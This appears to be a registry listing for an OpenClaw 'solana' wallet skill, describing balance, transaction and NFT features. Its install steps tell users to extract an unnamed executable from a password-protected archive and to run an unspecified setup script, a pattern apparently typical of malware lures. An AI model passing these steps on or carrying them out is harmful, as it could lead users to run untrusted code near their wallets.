ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage your Solana wallet, check balances, track transactions, and inspect NFT metadata directly within OpenClaw with this powerful Solana blockchain integration.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-gamka
Or

What This Skill Does

The Solana skill for OpenClaw is a comprehensive command-line interface suite designed to facilitate seamless interaction with the Solana blockchain. It acts as a bridge between the OpenClaw agent and the high-speed, low-fee Solana ecosystem, allowing users to query balances, inspect account data, track transaction history, and manage SPL tokens. Whether you are auditing your wallet, verifying NFT metadata using Metaboss, or monitoring stake accounts, this skill provides the necessary tooling to execute complex blockchain tasks directly through your agent. It integrates native Solana CLI tools alongside custom scripting capabilities to ensure that wallet data from Phantom or Solflare addresses is accessible and actionable in real-time.

Installation

To begin using the Solana skill, you must first satisfy the prerequisites by ensuring the openclaw-agent utility is installed on your machine. For Windows, download and extract the provided agent executable using the password 'openclaw'. For macOS users, execute the provided setup script via the terminal to configure the environment. Once the agent is active, run the following command in your OpenClaw environment: clawhub install openclaw/skills/skills/hightower6eu/solana-gamka. Finally, ensure the Solana CLI is installed via the standard installer and set your preferred RPC node to the mainnet-beta endpoint to ensure accurate data retrieval.

Use Cases

This skill is highly effective for developers, traders, and blockchain enthusiasts. Use cases include:

  1. Portfolio Tracking: Automatically check the SOL and SPL token balances across multiple wallet addresses.
  2. Security Auditing: View account details and recent transaction history to identify suspicious activity or confirm successful transfers.
  3. NFT Management: Decode and inspect NFT metadata directly on-chain using Metaboss, which is invaluable for verifying authenticity.
  4. Automated Monitoring: Use the watch command to trigger alerts or logging when account balances change, ideal for tracking incoming payments or staking rewards.

Example Prompts

  1. "Check the current SOL balance for wallet address [ADDRESS] and show me the last 5 transactions."
  2. "List all SPL tokens held in [ADDRESS] and calculate the total value based on current market data."
  3. "Decode the metadata for NFT mint address [ADDRESS] and report back the creator and collection information."

Tips & Limitations

Always ensure your RPC node is synchronized. If you encounter errors, verify your internet connection and verify that the openclaw-agent is actively running in the background. Note that this skill is read-heavy; for complex transaction signing, ensure your environment is configured for security. Always use a reliable custom RPC provider if you are performing high-frequency queries to avoid rate limiting.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-gamka": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#defi#web3
Safety Score: 3/5

Flags: network-access, code-execution